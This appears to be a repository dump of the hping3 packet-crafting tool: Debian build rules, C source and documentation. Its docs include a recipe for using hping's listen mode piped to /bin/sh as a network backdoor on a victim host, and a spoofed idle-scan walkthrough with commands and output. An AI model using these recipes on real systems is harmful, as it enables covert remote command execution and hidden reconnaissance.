100_hyphen_used_as_minus_sign.diff 11 | 110_dontfrag_offbyone.diff 12 | 120_rtt_icmp_unreachable.diff 13 | 130_spelling_error_in_binary.diff 14 | 140_data_size_udp.diff 15 | 150_gnu_kfreebsd.diff 16 | 160_tcp_mss.diff 17 | -------------------------------------------------------------------------------- /debian/rules: -------------------------------------------------------------------------------- 1 | #!/usr/bin/make -f 2 | 3 | include /usr/share/quilt/quilt.make 4 | 5 | DEB_HOST_GNU_TYPE ?= $(shell dpkg-architecture -qDEB_HOST_GNU_TYPE) 6 | DEB_BUILD_GNU_TYPE ?= $(shell dpkg-architecture -qDEB_BUILD_GNU_TYPE) 7 | 8 | CFLAGS = -Wall -g 9 | 10 | ifneq (,$(findstring noopt,$(DEB_BUILD_OPTIONS))) 11 | CFLAGS += -O0 12 | else 13 | CFLAGS += -O2 14 | endif 15 | 16 | configure: configure-stamp 17 | configure-stamp: 18 | dh_testdir 19 | 20 | CFLAGS="$(CFLAGS)" ./configure --host=$(DEB_HOST_GNU_TYPE) \ 21 | --build=$(DEB_BUILD_GNU_TYPE) \ 22 | --prefix=/usr --mandir=\$${prefix}/share/man \ 23 | --infodir=\$${prefix}/share/info 24 | touch configure-stamp 25 | 26 | build: patch configure-stamp build-stamp 27 | 28 | build-stamp: 29 | dh_testdir 30 | 31 | $(MAKE) 32 | 33 | touch build-stamp 34 | 35 | clean: clean-patched unpatch 36 | clean-patched: 37 | dh_testdir 38 | dh_testroot 39 | rm -f build-stamp configure-stamp patch-stamp 40 | 41 | [ ! -f Makefile ] || $(MAKE) distclean 42 | 43 | dh_clean 44 | 45 | install: build 46 | dh_testdir 47 | dh_testroot 48 | dh_prep 49 | dh_installdirs 50 | 51 | $(MAKE) install DESTDIR=$(CURDIR)/debian/hping3/ 52 | mkdir -p $(CURDIR)/debian/hping3/usr/share/man/fr/man8 53 | gzip -9 -c $(CURDIR)/docs/french/hping2-fr.8 > $(CURDIR)/debian/hping3/usr/share/man/fr/man8/hping3.8.gz 54 | 55 | 56 | binary-indep: build install 57 | 58 | binary-arch: build install 59 | dh_testdir 60 | dh_testroot 61 | dh_installchangelogs CHANGES 62 | dh_installdocs 63 | dh_installexamples 64 | dh_installman 65 | dh_link 66 | dh_strip 67 | dh_compress -X.htcl # do not compress example TCL scripts 68 | dh_fixperms 69 | dh_installdeb 70 | dh_shlibdeps 71 | dh_gencontrol 72 | dh_md5sums 73 | dh_builddeb 74 | 75 | binary: binary-indep binary-arch 76 | .PHONY: build clean binary-indep binary-arch binary install 77 | -------------------------------------------------------------------------------- /debian/watch: -------------------------------------------------------------------------------- 1 | # No upstream release since 2005. 2 | -------------------------------------------------------------------------------- /display_ipopt.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1989 The Regents of the University of California. 3 | * All rights reserved. 4 | * 5 | * This code is derived from software contributed to Berkeley by 6 | * Mike Muuss. 7 | * 8 | * Redistribution and use in source and binary forms, with or without 9 | * modification, are permitted provided that the following conditions 10 | * are met: 11 | * 1. Redistributions of source code must retain the above copyright 12 | * notice, this list of conditions and the following disclaimer. 13 | * 2. Redistributions in binary form must reproduce the above copyright 14 | * notice, this list of conditions and the following disclaimer in the 15 | * documentation and/or other materials provided with the distribution. 16 | * 3. All advertising materials mentioning features or use of this software 17 | * must display the following acknowledgement: 18 | * This product includes software developed by the University of 19 | * California, Berkeley and its contributors. 20 | * 4. Neither the name of the University nor the names of its contributors 21 | * may be used to endorse or promote products derived from this software 22 | * without specific prior written permission. 23 | * 24 | * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND 25 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 26 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 27 | * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE 28 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 29 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 30 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 31 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 32 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 33 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 34 | * SUCH DAMAGE. 35 | */ 36 | 37 | /* $Id: display_ipopt.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 38 | 39 | #include 40 | #include 41 | #include 42 | #include 43 | #include 44 | #include 45 | 46 | #include "hping2.h" 47 | #include "globals.h" 48 | 49 | /* ripped from ping */ 50 | 51 | void display_ipopt(char* buf) 52 | { 53 | int i,j; 54 | unsigned long l; 55 | static int old_rrlen; 56 | static char old_rr[MAX_IPOPTLEN]; 57 | unsigned char* cp; 58 | int hlen; 59 | struct myiphdr *ip; 60 | struct in_addr in; 61 | 62 | 63 | ip = (struct myiphdr *)buf; 64 | hlen = ip->ihl * 4; 65 | 66 | cp = (u_char *)buf + sizeof(struct myiphdr); 67 | 68 | for (; hlen > (int)sizeof(struct myiphdr); --hlen, ++cp) 69 | switch (*cp) { 70 | case IPOPT_EOL: 71 | hlen = 0; 72 | break; 73 | case IPOPT_LSRR: 74 | (void)printf("LSRR: "); 75 | hlen -= 2; 76 | j = *++cp; 77 | ++cp; 78 | if (j > IPOPT_MINOFF) 79 | for (;;) { 80 | l = *++cp; 81 | l = (l<<8) + *++cp; 82 | l = (l<<8) + *++cp; 83 | l = (l<<8) + *++cp; 84 | in.s_addr=htonl(l); 85 | printf("\t%s",inet_ntoa(in)); 86 | hlen -= 4; 87 | j -= 4; 88 | if (j <= IPOPT_MINOFF) 89 | break; 90 | (void)putchar('\n'); 91 | } 92 | break; 93 | case IPOPT_RR: 94 | j = *++cp; /* get length */ 95 | i = *++cp; /* and pointer */ 96 | hlen -= 2; 97 | if (i > j) 98 | i = j; 99 | i -= IPOPT_MINOFF; 100 | if (i <= 0) 101 | continue; 102 | if (i == old_rrlen 103 | && cp == (u_char *)buf + sizeof(struct myiphdr) + 2 104 | && !memcmp((char *)cp, old_rr, i)) { 105 | (void)printf("\t(same route)\n"); 106 | i = ((i + 3) / 4) * 4; 107 | hlen -= i; 108 | cp += i; 109 | break; 110 | } 111 | old_rrlen = i; 112 | memcpy(old_rr, cp, i); 113 | (void)printf("RR: "); 114 | for (;;) { 115 | l = *++cp; 116 | l = (l<<8) + *++cp; 117 | l = (l<<8) + *++cp; 118 | l = (l<<8) + *++cp; 119 | in.s_addr=htonl(l); 120 | printf("\t%s",inet_ntoa(in)); 121 | hlen -= 4; 122 | i -= 4; 123 | if (i <= 0) 124 | break; 125 | (void)putchar('\n'); 126 | } 127 | putchar('\n'); 128 | 129 | break; 130 | case IPOPT_NOP: 131 | (void)printf("NOP\n"); 132 | break; 133 | default: 134 | (void)printf("unknown option %x\n", *cp); 135 | break; 136 | } 137 | 138 | } 139 | -------------------------------------------------------------------------------- /docs/APD.txt: -------------------------------------------------------------------------------- 1 | ARS Packet Description system 2 | 3 | This document describes the APD format. APD is a way to describe TCP/IP 4 | packets, and it is used in high level functions of the ARS library. 5 | The general format is the following: 6 | 7 | layer_type{field_1=value_1,field_2=value_2,...,field_n=value_n} 8 | 9 | more layers can be combined using the "+" simbol. Example: 10 | 11 | ip{dst=192.168.1.2}+udp{sport=53,dport=53}+data{file=./dns.packet} 12 | 13 | You don't need to specify fields that ARS can guess. For example 14 | if you don't specify checksums they will be correctly generated 15 | in the process of packet compilation. 16 | 17 | AVAILABLE LAYERS 18 | ~~~~~~~~~~~~~~~~ 19 | 20 | A layer type is one of the following: 21 | 22 | ip IP header 23 | ipopt.eol IP option EOL 24 | ipopt.nop IP option NOP 25 | ipopt.sec IP option Security 26 | ipopt.sid IP option Stream ID 27 | ipopt.lsrr IP option Loose Source Routing 28 | ipopt.ssrr IP option Strict Source Routing 29 | ipopt.rr IP option Record Route 30 | ipopt.ts IP option Timestamp 31 | udp UDP header 32 | tcp TCP header 33 | tcpopt.eol TCP option END (EOL) 34 | tcpopt.nop TCP option NOP 35 | tcpopt.mss TCP option Max Segment Size 36 | tcpopt.wscale TCP option Window Scale 37 | tcpopt.sackperm TCP option Selective ACK permitted 38 | tcpopt.sack TCP option Selective ACK 39 | tcpopt.echoreq TCP option Echo Request 40 | tcpopt.echoreply TCP option Echo Reply 41 | tcpopt.ts TCP option Timestamp 42 | icmp ICMP header 43 | data Generic Data 44 | 45 | Different fields are defined for different layer types: 46 | 47 | IP FIELDS: DESCRIPTION: POSSIBLE VALUE: 48 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 49 | saddr Source address 192.168.1.2, or www.yahoo.com 50 | daddr Destination address 192.168.1.2, or www.yahoo.com 51 | ihl IP header len numerical value 52 | ver IP version numerical value 53 | tos Type of Service numerical value 54 | totlen IP tot len numerical value 55 | id IP packet ID numerical value 56 | fragoff IP fragment offset numerical vaule 57 | mf More Fragment 0 or 1 58 | df Dont Fragment 0 or 1 59 | rf Reserved Frag. bit 0 or 1 60 | ttl Time to Live numerical value 61 | proto ip protocol field numerical value 62 | cksum ip checksum numerical value 63 | 64 | UDP FIELDS: DESCRIPTION: POSSIBLE VALUE: 65 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 66 | sport Source port numerical value 67 | dport Destination port numerical value 68 | len UDP len field numerical value 69 | cksum UDP checksum numerical value 70 | 71 | TCP FIELDS: DESCRIPTION: POSSIBLE VALUE: 72 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 73 | sport Source port numerical value 74 | dport Destination port numerical value 75 | seq TCP sequence number numerical value 76 | ack TCP acknowledge number numerical value 77 | x2 TCP reserved bits numerical value 78 | off TCP header size numerical value 79 | flags TCP flags FSRPAUXY (see the example) 80 | win TCP window numerical value 81 | cksum TCP checksum numerical value 82 | urp TCP urgent pointer numerical value 83 | 84 | ICMP FIELDS: DESCRIPTION: POSSIBLE VALUE: 85 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 86 | type ICMP type numerical value 87 | code ICMP code numerical value 88 | cksum ICMP cksum numerical value 89 | id ICMP echo ID numerical value 90 | seq ICMP echo sequence nr numerical value 91 | gw ICMP gateway 192.168.1.2 or www.yahoo.com 92 | unused ICMP 32bit id/seq/gw numerical value 93 | 94 | DATA FIELDS: DESCRIPTION: POSSIBLE VALUE: 95 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 96 | file Data file /etc/passwd 97 | str A string hello world! (no escaping available) 98 | uint32 A 32bit integer numerical value 99 | uint24 A 24bit integer numerical value 100 | uint16 A 16bit integer numerical value 101 | uint8 A 8bit integer numerical value 102 | 103 | Other layer types fields aren't still implemented, anyway 104 | most of this contains sane defaults, (like IP record route option 105 | and so on). 106 | 107 | You can specify numerical values as hex, octal and decimal numbers. 108 | 109 | Decimail: 10 110 | Hex: 0xA 111 | Octal: 012 112 | 113 | Examples 114 | ~~~~~~~~ 115 | 116 | /* Just an ICMP echo request */ 117 | ip{saddr=1.2.3.4,daddr=www.yahoo.com}+icmp{type=8,code=0}\ 118 | +data{str=hello world} 119 | 120 | /* An ICMP destination unreachable with the quoted UDP packet */ 121 | ip{saddr=1.2.3.4,daddr=5.6.7.8}+icmp{type=3,code=3}\ 122 | +ip{saddr=www.yahoo.com,daddr=1.2.3.4}+udp{sport=53,dport=53}\ 123 | 124 | /* A TCP packet with the SYN flag set */ 125 | ip{saddr=1.2.3.4,daddr=5.6.7.8}+tcp{flags=S,dport=80,sport=10} 126 | -------------------------------------------------------------------------------- /docs/AS-BACKDOOR: -------------------------------------------------------------------------------- 1 | hping can be used as a backdoor. Just try the -9 (--listen) option 2 | and put in pipe with /bin/sh: 3 | 4 | Put hping in listen mode in the victim host. 5 | 6 | victim# hping -I eth0 -9 mysign | /bin/sh 7 | 8 | Every packet that contain "mysign" will be processed by hping, 9 | all the bytes that follows "mysign" in the packet will be dumped 10 | to the standard output, so for example I'll able to exec commands 11 | using all types of protocols. Just for example I can use the smtpd 12 | to exec 'ls' in the victim. 13 | 14 | evil$ telnet victim 25 15 | 16 | Trying 192.168.1.1... 17 | Connected to nano (192.168.1.1). 18 | Escape character is '^]'. 19 | 220 nano.marmoc.net ESMTP Sendmail 20 | mysignls; 21 | 22 | on the victim you will see: 23 | 24 | victim# hping -I eth0 -9 mysign | /bin/sh 25 | hping2 listen mode 26 | bin cdrom etc home local-home mnt root tmp var 27 | boot dev export lib lost+found proc sbin usr 28 | : command not found 29 | 30 | As you can see I used 'ls;' since otherwise the shell will receive 31 | just ls^M. The ";" force the command execution (at least with bash and zsh, 32 | check your shell for more information). 33 | 34 | This works with all kind of valid not-filtered IP packets, the higher 35 | level protocl does not matter. 36 | 37 | antirez 38 | -------------------------------------------------------------------------------- /docs/HPING2-IS-OPEN: -------------------------------------------------------------------------------- 1 | I want to spend two words about hping2 developing model. 2 | Hping2 is totally open to new contribution and ideas, 3 | if you have even the littlest idea in order to make 4 | hping better or you make some patch send me an email. 5 | All the patches, if they don't break the old code and 6 | are not totally useless, will be included. I know of 7 | a lot of projects that are GPLed but in some way "close" 8 | since every new patch is considered bloat or the only 9 | possible code is the primary authors code: THIS IS 10 | NOT THE CASE! Also every the littlest doc contribution 11 | will be added to hping2, you can just build a plain-text 12 | file that exposes how to do some task with hping, it will 13 | be included under the 'docs' directory. 14 | 15 | antirez 16 | -------------------------------------------------------------------------------- /docs/HPING3.txt: -------------------------------------------------------------------------------- 1 | Please check wiki.hping.org 2 | -------------------------------------------------------------------------------- /docs/MORE-FUN-WITH-IPID: -------------------------------------------------------------------------------- 1 | Posted to bugtraq mailing list (20 Nov 1999): 2 | 3 | --- 4 | Hi, 5 | 6 | some little new ideas about IP ID issue: 7 | 8 | The first is about linux firewalling: since it increase IP ID global counter 9 | even if an outgoing packet will be filtered we are able, for example, to 10 | scan UDP ports even if ICMP type 3 output is DENY, and in general it is possibleto know when TCP/IP stack reply a packet even if the reply is dropped. 11 | I think (but not tested) that this is true for almost all firewalls. 12 | 13 | The second issue concern the ability to uncover firewall rules. For example 14 | it is travial to know if host A filter packets from the IP X.Y.Z.W monitoring 15 | IP ID incresing of host A or host with X.Y.Z.W address (this changes if we are 16 | interested to know input or output rules) and sending packets that suppose 17 | some reply. Also this is related with the ability to scan the ports of hosts 18 | that drop all packets with a source different than host.trusted.com. 19 | There are others stuff like this but they are only different faces of the 20 | same concepts. 21 | 22 | Some people thinks that this kind of attacks isn't a "real world" attacks, 23 | I'm strongly interested to know what's bugtraq readers opinion (IMO this 24 | kind of attacks are feasible and usefull for an attacker. For exaple the 25 | ability to scan the ports with only spoofed packets and the ability to 26 | guess remote hosts traffic are a lot real). 27 | 28 | ciao, 29 | antirez 30 | -------------------------------------------------------------------------------- /docs/SPOOFED_SCAN.txt: -------------------------------------------------------------------------------- 1 | The following is the original posting to bugtraq 2 | about spoofed/indirect/idle scan method. See 3 | the HPING2-HOWTO for more informations. 4 | 5 | antirez 6 | 7 | --- 8 | 9 | Hi, 10 | 11 | I have uncovered a new tcp port scan method. 12 | Instead all others it allows you to scan using spoofed 13 | packets, so scanned hosts can't see your real address. 14 | In order to perform this i use three well known tcp/ip 15 | implementation peculiarities of most OS: 16 | 17 | (1) * hosts reply SYN|ACK to SYN if tcp target port is open, 18 | reply RST|ACK if tcp target port is closed. 19 | 20 | (2) * You can know the number of packets that hosts are sending 21 | using id ip header field. See my previous posting 'about the ip 22 | header' in this ml. 23 | 24 | (3) * hosts reply RST to SYN|ACK, reply nothing to RST. 25 | 26 | 27 | The Players: 28 | 29 | host A - evil host, the attacker. 30 | host B - silent host. 31 | host C - victim host. 32 | 33 | A is your host. 34 | B is a particular host: It must not send any packets while 35 | you are scanning C. There are a lot of 'zero traffic' hosts 36 | in internet, especially in the night :) 37 | C is the victim, it must be vulnerable to SYN scan. 38 | 39 | I've called this scan method 'dumb host scan' in honour of host 40 | B characteristics. 41 | 42 | 43 | How it works: 44 | 45 | Host A monitors number of outgoing packets from B using id iphdr. 46 | You can do this simply using hping: 47 | 48 | #hping B -r 49 | HPING B (eth0 xxx.yyy.zzz.jjj): no flags are set, 40 data bytes 50 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=0 ttl=64 id=41660 win=0 time=1.2 ms 51 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=1 ttl=64 id=+1 win=0 time=75 ms 52 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=2 ttl=64 id=+1 win=0 time=91 ms 53 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=3 ttl=64 id=+1 win=0 time=90 ms 54 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=4 ttl=64 id=+1 win=0 time=91 ms 55 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=5 ttl=64 id=+1 win=0 time=87 ms 56 | -cut- 57 | .. 58 | . 59 | 60 | As you can see, id increases are always 1. So this host have the 61 | characteristics that host B should to own. 62 | 63 | Now host A sends SYN to port X of C spoofing from B. 64 | (using hping => 0.67 is very easy, http://www.kyuzz.org/antirez) 65 | if port X of C is open, host C will send SYN|ACK to B (yes, 66 | host C don't know that the real sender is A). In this 67 | case host B replies to SYN|ACK with a RST. 68 | If we send to host C a few of SYN it will reply to B with a few 69 | of SYN|ACK, so B will reply to C a few of RST... so 70 | we'll see that host B is sending packets! 71 | 72 | . 73 | .. 74 | -cut- 75 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=17 ttl=64 id=+1 win=0 time=96 ms 76 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=18 ttl=64 id=+1 win=0 time=80 ms 77 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=19 ttl=64 id=+2 win=0 time=83 ms 78 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=20 ttl=64 id=+3 win=0 time=94 ms 79 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=21 ttl=64 id=+1 win=0 time=92 ms 80 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=22 ttl=64 id=+2 win=0 time=82 ms 81 | -cut- 82 | .. 83 | . 84 | 85 | The port is open! 86 | 87 | Instead, if port X of C is closed sending to C a few 88 | of SYN spoofed from B, it will reply with RST to B, and 89 | B will not reply (see 3). So we'll see that host B is not sending 90 | any packet: 91 | 92 | . 93 | .. 94 | -cut- 95 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=52 ttl=64 id=+1 win=0 time=85 ms 96 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=53 ttl=64 id=+1 win=0 time=83 ms 97 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=54 ttl=64 id=+1 win=0 time=93 ms 98 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=55 ttl=64 id=+1 win=0 time=74 ms 99 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=56 ttl=64 id=+1 win=0 time=95 ms 100 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=57 ttl=64 id=+1 win=0 time=81 ms 101 | -cut- 102 | .. 103 | . 104 | 105 | The port is closed. 106 | 107 | All this can appear complicated to perform, but using two sessions 108 | of hping on Linux virtual consoles or under X makes it more simple. 109 | First session listen host B: hping B -r 110 | Second session send spoofed SYN: hping C -a B -S 111 | 112 | Sorry if my english is not so clear. 113 | However this posting is not adequate to describe exaustively 114 | this scan method, so i'll write a paper on this topic, specially 115 | about how to implement this in a port scanner (i.e. nmap), and 116 | about players characteristics and OS used. 117 | 118 | happy new year, 119 | antirez 120 | -------------------------------------------------------------------------------- /docs/french/AS-BACKDOOR: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NullHypothesis/hping3/d177ea2995f0e111c6ab50dcd9c3b0613ab07a01/docs/french/AS-BACKDOOR -------------------------------------------------------------------------------- /docs/french/HPING2-HOWTO.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NullHypothesis/hping3/d177ea2995f0e111c6ab50dcd9c3b0613ab07a01/docs/french/HPING2-HOWTO.txt -------------------------------------------------------------------------------- /docs/french/HPING2-IS-OPEN: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NullHypothesis/hping3/d177ea2995f0e111c6ab50dcd9c3b0613ab07a01/docs/french/HPING2-IS-OPEN -------------------------------------------------------------------------------- /docs/french/INSTALL: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NullHypothesis/hping3/d177ea2995f0e111c6ab50dcd9c3b0613ab07a01/docs/french/INSTALL -------------------------------------------------------------------------------- /docs/french/MORE-FUN-WITH-IPID: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NullHypothesis/hping3/d177ea2995f0e111c6ab50dcd9c3b0613ab07a01/docs/french/MORE-FUN-WITH-IPID -------------------------------------------------------------------------------- /docs/french/Makefile: -------------------------------------------------------------------------------- 1 | TXT = hping2-fr.8.txt 2 | 3 | all: $(TXT) 4 | 5 | hping2-fr.8.txt: hping2-fr.8 6 | #groff -t -e -mandoc -Tlatin1 hping2-fr.8 | col -bx | uniq > hping2-fr.8.txt 7 | #groff -t -e -mandoc -Tlatin1 hping2-fr.8 | uniq > hping2-fr.8.txt 8 | groff -t -e -mandoc -Tlatin1 hping2-fr.8 | LC_ALL=fr_FR.ISO-8859-1 col -bx | uniq > hping2-fr.8.txt 9 | 10 | clean: 11 | rm -f *~ $(TXT) 12 | -------------------------------------------------------------------------------- /docs/french/NEWS: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NullHypothesis/hping3/d177ea2995f0e111c6ab50dcd9c3b0613ab07a01/docs/french/NEWS -------------------------------------------------------------------------------- /docs/french/SPOOFED_SCAN.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NullHypothesis/hping3/d177ea2995f0e111c6ab50dcd9c3b0613ab07a01/docs/french/SPOOFED_SCAN.txt -------------------------------------------------------------------------------- /docs/french/hping2-fr.8: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NullHypothesis/hping3/d177ea2995f0e111c6ab50dcd9c3b0613ab07a01/docs/french/hping2-fr.8 -------------------------------------------------------------------------------- /docs/french/hping2-fr.8.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NullHypothesis/hping3/d177ea2995f0e111c6ab50dcd9c3b0613ab07a01/docs/french/hping2-fr.8.txt -------------------------------------------------------------------------------- /docs/hping2rc.example: -------------------------------------------------------------------------------- 1 | # Example hping2rc adding support for readline 2 | 3 | catch {package require tclreadline} 4 | if {[catch {package present tclreadline} x]} { 5 | puts $x 6 | set has_readline 0 7 | } else { 8 | set has_readline 1 9 | } 10 | if {$tcl_interactive && $has_readline} { 11 | package require tclreadline 12 | proc ::tclreadline::prompt1 {} { 13 | global hping_version 14 | return "hping$hping_version\> " 15 | } 16 | tclreadline::Loop 17 | } 18 | -------------------------------------------------------------------------------- /fixtypes.h: -------------------------------------------------------------------------------- 1 | #ifndef HPING3_FIXTYPES_H 2 | #define HPING3_FIXTYPES_H 3 | 4 | #ifdef __sun__ 5 | typedef char int_8_t; 6 | typedef unsigned char u_int8_t; 7 | typedef short int_16_t; 8 | typedef unsigned short u_int16_t; 9 | typedef int int_32_t; 10 | typedef unsigned int u_int32_t; 11 | #endif 12 | 13 | #endif 14 | -------------------------------------------------------------------------------- /gentables.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include "sbignum.h" 6 | 7 | static char *cset = "0123456789abcdefghijklmnopqrstuvwxyz"; 8 | 9 | static void gen_cset(int hdr); 10 | static void gen_rcset(int hdr); 11 | static void gen_bitstable(int hdr); 12 | static void gen_basetable(int hdr); 13 | static void _gen_basetable(int bytes, double base); 14 | static void gen_basepowtable(int hdr); 15 | static void _gen_basepowtable(int bytes, double base); 16 | static unsigned long lexp(unsigned long b, int e); 17 | static int nbits(unsigned char x); 18 | static double logbn(double base, double n); 19 | 20 | #define EFL 16 /* elements for line */ 21 | 22 | int main(int argc, char **argv) 23 | { 24 | int hdr = argc-1; 25 | argv = argv; 26 | 27 | if (hdr) { 28 | printf( "#ifndef _SBN_TABLES_H\n" 29 | "#define _SBN_TABLES_H\n" 30 | "\n" 31 | "#include \n\n"); 32 | } else { 33 | printf( "#include \"tables.h\"\n" 34 | "#include \"sbignum.h\"\n\n"); 35 | } 36 | gen_cset(hdr); 37 | gen_rcset(hdr); 38 | gen_bitstable(hdr); 39 | gen_basetable(hdr); 40 | gen_basepowtable(hdr); 41 | if (hdr) { 42 | printf("\n#endif /* _SBN_TABLES_H */\n"); 43 | } 44 | return 0; 45 | } 46 | 47 | void gen_cset(int hdr) 48 | { 49 | if (hdr) { 50 | printf("extern char *cset;\n"); 51 | return; 52 | } 53 | printf("/* maps a number to a char */\n"); 54 | printf("char *cset = \"%s\";\n\n", cset); 55 | } 56 | 57 | void gen_rcset(int hdr) 58 | { 59 | int i; 60 | 61 | if (hdr) { 62 | printf("extern int8_t r_cset[256];\n"); 63 | return; 64 | } 65 | printf("/* maps a char to a number */\n"); 66 | printf("int8_t r_cset[256] = {\n"); 67 | for (i = 0; i < 256; i++) { 68 | char *p; 69 | p = strchr(cset, i); 70 | if (!(i%EFL)) 71 | printf("\t"); 72 | if (!p || !i) { 73 | printf("-1, "); 74 | } else { 75 | printf("%2d, ", p-cset); 76 | } 77 | if (!((i+1) % EFL)) 78 | printf("\n"); 79 | } 80 | printf("};\n\n"); 81 | } 82 | 83 | int nbits(unsigned char x) 84 | { 85 | int i = 8; 86 | int bits = 0; 87 | do { 88 | bits += x & 1; 89 | x >>= 1; 90 | } while(--i); 91 | return bits; 92 | } 93 | 94 | void gen_bitstable(int hdr) 95 | { 96 | int i; 97 | 98 | if (hdr) { 99 | printf("extern int8_t bitstable[256];\n"); 100 | return; 101 | } 102 | printf("/* bitstable[n] is the number of set bits\n" 103 | " * in the number 'n' */\n"); 104 | printf("int8_t bitstable[256] = {\n"); 105 | for (i = 0; i < 256; i++) { 106 | if (!(i%EFL)) 107 | printf("\t"); 108 | printf("%d, ", nbits(i)); 109 | if (!((i+1) % EFL)) 110 | printf("\n"); 111 | } 112 | printf("};\n\n"); 113 | } 114 | 115 | double logbn(double base, double n) 116 | { 117 | return log(n)/log(base); 118 | } 119 | 120 | void _gen_basetable(int bytes, double base) 121 | { 122 | int i; 123 | 124 | printf("#if ATOMBYTES == %d\n", bytes); 125 | printf("double basetable[%d] = {\n", SBN_MAXBASE+1); 126 | for (i = 0; i <= SBN_MAXBASE; i++) { 127 | if (i < 2) { 128 | printf("\t0, /* unused */\n"); 129 | continue; 130 | } 131 | printf("\t%f, /* (log of %d in base %.0f) */\n", 132 | logbn(i, base), i, base); 133 | } 134 | printf("};\n#endif\n\n"); 135 | } 136 | 137 | #define BT_8BITBASE 256U 138 | #define BT_16BITBASE 65536U 139 | #define BT_32BITBASE 4294967296U 140 | 141 | void gen_basetable(int hdr) 142 | { 143 | if (hdr) { 144 | printf("extern double basetable[%d];\n", SBN_MAXBASE+1); 145 | return; 146 | } 147 | printf("/* basetable[b] = number of digits needed to convert\n" 148 | " * an mpz atom in base 'b' */\n"); 149 | _gen_basetable(1, BT_8BITBASE); 150 | _gen_basetable(2, BT_16BITBASE); 151 | _gen_basetable(4, BT_32BITBASE); 152 | } 153 | 154 | /* return b^e */ 155 | unsigned long lexp(unsigned long b, int e) 156 | { 157 | unsigned long p = b; 158 | if (!e) return 1; 159 | while(--e) 160 | p *= b; 161 | return p; 162 | } 163 | 164 | void _gen_basepowtable(int bytes, double base) 165 | { 166 | int i; 167 | 168 | base--; 169 | printf("#if ATOMBYTES == %d\n", bytes); 170 | printf("struct sbn_basepow basepowtable[%d] = {\n", SBN_MAXBASE+1); 171 | for (i = 0; i <= SBN_MAXBASE; i++) { 172 | unsigned long bexp; 173 | unsigned long bpow; 174 | if (i < 2) { 175 | printf("\t{0,0}, /* unused */\n"); 176 | continue; 177 | } 178 | bexp = (unsigned long) floor(logbn(i, base)); 179 | bpow = lexp(i, bexp); 180 | printf("\t{%luU, %luU}, /* floor(log of %d in base %.0f) */\n", 181 | bpow, bexp, i, base); 182 | } 183 | printf("};\n#endif\n\n"); 184 | } 185 | 186 | void gen_basepowtable(int hdr) 187 | { 188 | if (hdr) { 189 | printf( "struct sbn_basepow {\n" 190 | " unsigned long maxpow;\n" 191 | " unsigned long maxexp;\n" 192 | "};\n"); 193 | printf("extern struct sbn_basepow basepowtable[%d];\n", 194 | SBN_MAXBASE+1); 195 | return; 196 | } 197 | printf( 198 | "/* basepowtable[b] = the first column is the biggest power of 'b'\n" 199 | " * that fits in mpz_atom_t, the second column is the exponent\n" 200 | " * 'e' so that b^e = the value of the first column */\n"); 201 | _gen_basepowtable(1, BT_8BITBASE); 202 | _gen_basepowtable(2, BT_16BITBASE); 203 | _gen_basepowtable(4, BT_32BITBASE); 204 | } 205 | -------------------------------------------------------------------------------- /gentables.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | CC=${CC:=cc} 4 | CCOPT="-Wall -W -O2" 5 | 6 | $CC gentables.c -o gentables $CCOPT 7 | ./gentables > tables.c 8 | ./gentables h > tables.h 9 | echo Tables generated 10 | -------------------------------------------------------------------------------- 